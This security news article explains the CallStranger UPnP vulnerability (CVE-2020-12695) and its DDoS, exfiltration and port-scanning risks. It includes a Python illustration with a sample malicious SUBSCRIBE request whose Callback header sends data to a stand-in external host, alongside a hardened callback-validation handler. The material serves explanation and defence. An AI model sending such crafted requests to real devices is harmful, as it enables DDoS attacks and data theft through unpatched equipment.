Billions of devices may be affected by a universal plug and play (UPnP) vulnerability that lets attackers reach other connected devices and use the affected devices as a source of distributed denial of service (DDoS) traffic. The bug affects devices that implement the UPnP protocol, which lets devices discover and talk to each other on a local network. The recently disclosed bug, known as CallStranger, is caused by the Callback header value in the UPnP SUBSCRIBE function: the value is attacker-controlled, and the device will send its HTTP NOTIFY messages to whatever URL it names, which turns the device into a server-side request forgery (SSRF) proxy. The vulnerability can be used for DDoS attacks as well as data exfiltration. The UPnP protocol is maintained by the Open Connectivity Foundation (OCF), which has released an updated specification, but most device manufacturers have not yet incorporated the change in their firmware, leaving millions of devices vulnerable.
Risks of experiencing a DDoS attack or data exfiltration
The UPnP vulnerability, CVE-2020-12695, could be used to carry out a DDoS attack, bypass security controls, exfiltrate data, and scan internal ports. Data exfiltration is the biggest risk, according to Yunus Çadirci, the researcher who discovered the vulnerability in the universal plug and play protocol. Data exfiltration occurs when an unauthorized party gains access to a device on a network and copies data out, manually or with a program. Because the outbound request is made by a trusted device rather than by the attacker's own machine, it can pass controls that would block the attacker's traffic, and once a malicious actor has a foothold among the devices on the network there is little the organization can do to stop the data leaving.
Çadirci says botnet operators could start using end-user devices as DDoS sources. Even where an enterprise has blocked its Internet-exposed UPnP devices, an attacker who already has a foothold inside the network could still use the vulnerability for intranet-to-intranet port scanning.
The reason UPnP can be abused this way is its design around automatic discovery on a trusted network. The protocol is intended for use within a local area network where every device is trusted, so it requires no authentication or verification of the party sending a request. The UPnP DeviceProtection service adds an authentication layer on top of the protocol, but most UPnP device manufacturers have not adopted it.
Many Internet-facing devices include UPnP for easy setup. When the discovery and event subscription endpoints are reachable from the Internet, an attacker can make the device send large amounts of data to arbitrary destinations, because it is the device itself that performs the HTTP requests to the attacker-supplied callback URL.
Steps to protect vulnerable devices
To prevent devices within a local area network from being used as a DDoS source or as an exfiltration channel, UPnP vendors are advised to implement the specification update released by the OCF on April 17, 2020. Adoption will take time, because the fix depends on vendors patching their firmware. Device users should apply firmware updates as soon as their vendor releases them.
Device manufacturers are advised to disable the UPnP SUBSCRIBE capability by default and to require user consent and appropriate network restrictions before it is enabled. They should also disable UPnP on Internet-accessible interfaces.
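The mechanism described above (an attacker-controlled Callback header that the device then uses as the destination of its own NOTIFY requests) and the vendor-side hardening recommended here are shown together in the following Python example. It is an added illustration written for this page, not code from the CallStranger research, the OCF specification, or any vendor firmware. The SUBSCRIBE requests, the 192.168.1.0/24 network, the addresses and the exfiltration payload are constructed samples, and the acceptance policy in `callback_allowed` (plain HTTP, an IP literal inside the local network, equal to the subscriber's own address) is this example's choice rather than text quoted from the OCF update.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample (not captured from a real device): a SUBSCRIBE request as an
# attacker would send it. CALLBACK is the attacker-controlled header; its host is an
# Internet address and its path carries the data to exfiltrate.
MALICIOUS_SUBSCRIBE = (
    "SUBSCRIBE /upnp/event/WANIPConn1 HTTP/1.1\r\n"
    "HOST: 192.168.1.1:49152\r\n"
    "CALLBACK: <http://203.0.113.10:80/exfil?d=c2VjcmV0>\r\n"
    "NT: upnp:event\r\n"
    "TIMEOUT: Second-3600\r\n"
    "\r\n"
)

# Constructed sample: a legitimate subscription from a control point on the LAN.
BENIGN_SUBSCRIBE = (
    "SUBSCRIBE /upnp/event/WANIPConn1 HTTP/1.1\r\n"
    "HOST: 192.168.1.1:49152\r\n"
    "CALLBACK: <http://192.168.1.50:8080/notify>\r\n"
    "NT: upnp:event\r\n"
    "TIMEOUT: Second-3600\r\n"
    "\r\n"
)

LAN = ipaddress.ip_network("192.168.1.0/24")  # assumed network the device sits on


def parse_subscribe(raw: str) -> dict:
    """Split a SUBSCRIBE request into method, path and an upper-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().upper()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def parse_callbacks(header: str) -> list:
    """CALLBACK holds one or more URLs, each wrapped in angle brackets."""
    urls, rest = [], header
    while "<" in rest and ">" in rest:
        start = rest.index("<")
        end = rest.index(">", start)
        urls.append(rest[start + 1:end])
        rest = rest[end + 1:]
    return urls


def build_notify(callback_url: str, sid: str, body: str) -> str:
    """Render the NOTIFY the device sends to a callback URL. With an unchecked callback
    the attacker's host and path land in this request, and the device is the sender."""
    parts = urlsplit(callback_url)
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query
    return (
        f"NOTIFY {target} HTTP/1.1\r\n"
        f"HOST: {parts.netloc}\r\n"
        f"CONTENT-TYPE: text/xml; charset=\"utf-8\"\r\n"
        f"CONTENT-LENGTH: {len(body.encode())}\r\n"
        f"NT: upnp:event\r\nNTS: upnp:propchange\r\n"
        f"SID: {sid}\r\nSEQ: 0\r\n\r\n{body}"
    )


def vulnerable_accept(raw: str) -> list:
    """CallStranger pattern: every CALLBACK URL is stored and later used as a NOTIFY
    destination, so the device acts as an SSRF proxy for whoever can reach it."""
    req = parse_subscribe(raw)
    return parse_callbacks(req["headers"].get("CALLBACK", ""))


def callback_allowed(url: str, subscriber_ip: str, local_net) -> bool:
    """Policy chosen for this example (an assumption, not the OCF wording): plain HTTP,
    an IP literal (no hostnames, so DNS cannot redirect it later), inside the local
    network, and equal to the address the SUBSCRIBE itself came from."""
    parts = urlsplit(url)
    if parts.scheme != "http":
        return False
    try:
        host = ipaddress.ip_address(parts.hostname)
        parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    if host not in local_net:
        return False  # blocks Internet targets: the DDoS and exfiltration cases
    return host == ipaddress.ip_address(subscriber_ip)  # blocks intranet port scanning


def hardened_accept(raw: str, subscriber_ip: str, local_net=LAN):
    """Return (HTTP status, accepted callbacks). Any bad URL rejects the whole
    subscription with 412 Precondition Failed, the status UPnP uses for a bad SUBSCRIBE."""
    req = parse_subscribe(raw)
    urls = parse_callbacks(req["headers"].get("CALLBACK", ""))
    if not urls or not all(callback_allowed(u, subscriber_ip, local_net) for u in urls):
        return 412, []
    return 200, urls


if __name__ == "__main__":
    for url in vulnerable_accept(MALICIOUS_SUBSCRIBE):
        print(build_notify(url, "uuid:example-sid", "<e:propertyset/>"))
    print(hardened_accept(MALICIOUS_SUBSCRIBE, "192.168.1.50"))
    print(hardened_accept(BENIGN_SUBSCRIBE, "192.168.1.50"))
```

Running the block prints the NOTIFY that a vulnerable device would emit for the malicious subscription: its request line is `NOTIFY /exfil?d=c2VjcmV0 HTTP/1.1` with `HOST: 203.0.113.10:80`, so the attacker's data leaves the network inside a request that a DLP or egress filter sees as coming from the device. The hardened handler returns 412 for that request and for a callback pointing at another internal host or port, and accepts only the benign subscription whose callback goes back to the subscriber.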
Devices affected by the UPnP vulnerability include Windows PCs, gaming consoles, TVs, and routers from Asus, Belkin, Broadcom, Cisco, Dell, D-Link, Huawei, Netgear, Samsung, TP-Link, ZTE, and many more.
Home users are not expected to be targeted directly, but if their Internet-facing devices expose UPnP endpoints, those devices can be used as a DDoS source. They are therefore advised not to port-forward to UPnP endpoints.
Increased risks for the enterprise
With the Internet of Things (IoT) now common in enterprise networks, the UPnP vulnerability widens the attack surface and makes a successful breach more likely. Attackers can exfiltrate sensitive data through vulnerable devices and use them as DDoS sources against internal or external targets. To reduce these risks, organizations can disable UPnP support on IoT devices that have access to sensitive information and isolate such devices from the rest of the enterprise network. Updating the UPnP devices should nonetheless remain the priority.
Ilia Kolochenko, founder and CEO of web security company ImmuniWeb, says shadow IT and the complexity of IT infrastructure make enterprise networks more vulnerable to attack.
“Modern enterprises are characterized by a skyrocketing complexity of their IT infrastructure that may be dispersed across a hundred countries and maintained by thousands of third parties. On one side, this makes organizations extremely vulnerable and susceptible to cyber-attacks such as ransomware, which exploit shadow IT devices, unprotected cloud and abandoned servers as an entry point into their victim’s premises. On the other side, however, this convoluted intricacy makes a global attack virtually impossible, as some disjoint parts of the central system will continue working in isolation. It is nonetheless perfectly possible to identify the ‘heart and the brain’ of the system and target it directly with disastrous consequences.”
He adds that, “We will likely see professional cyber mercenaries being hired not just for data theft campaigns but for highly destructive and damage-creation hacking campaigns. Amid the political and economic crisis of unprecedented scale, many unscrupulous organizations and state actors won’t hesitate to crush their rivals by paralyzing their computerized factories, supply management chains and sales points. Given how interconnected our IT infrastructure has become, thanks to the rapid proliferation of IoT devices and connected objects, one wisely prepared attack could swiftly shut down a global company for several weeks or even months. Visibility, inventory and continuous monitoring of your digital assets and data is the key to avoiding falling victim to sophisticated attacks.”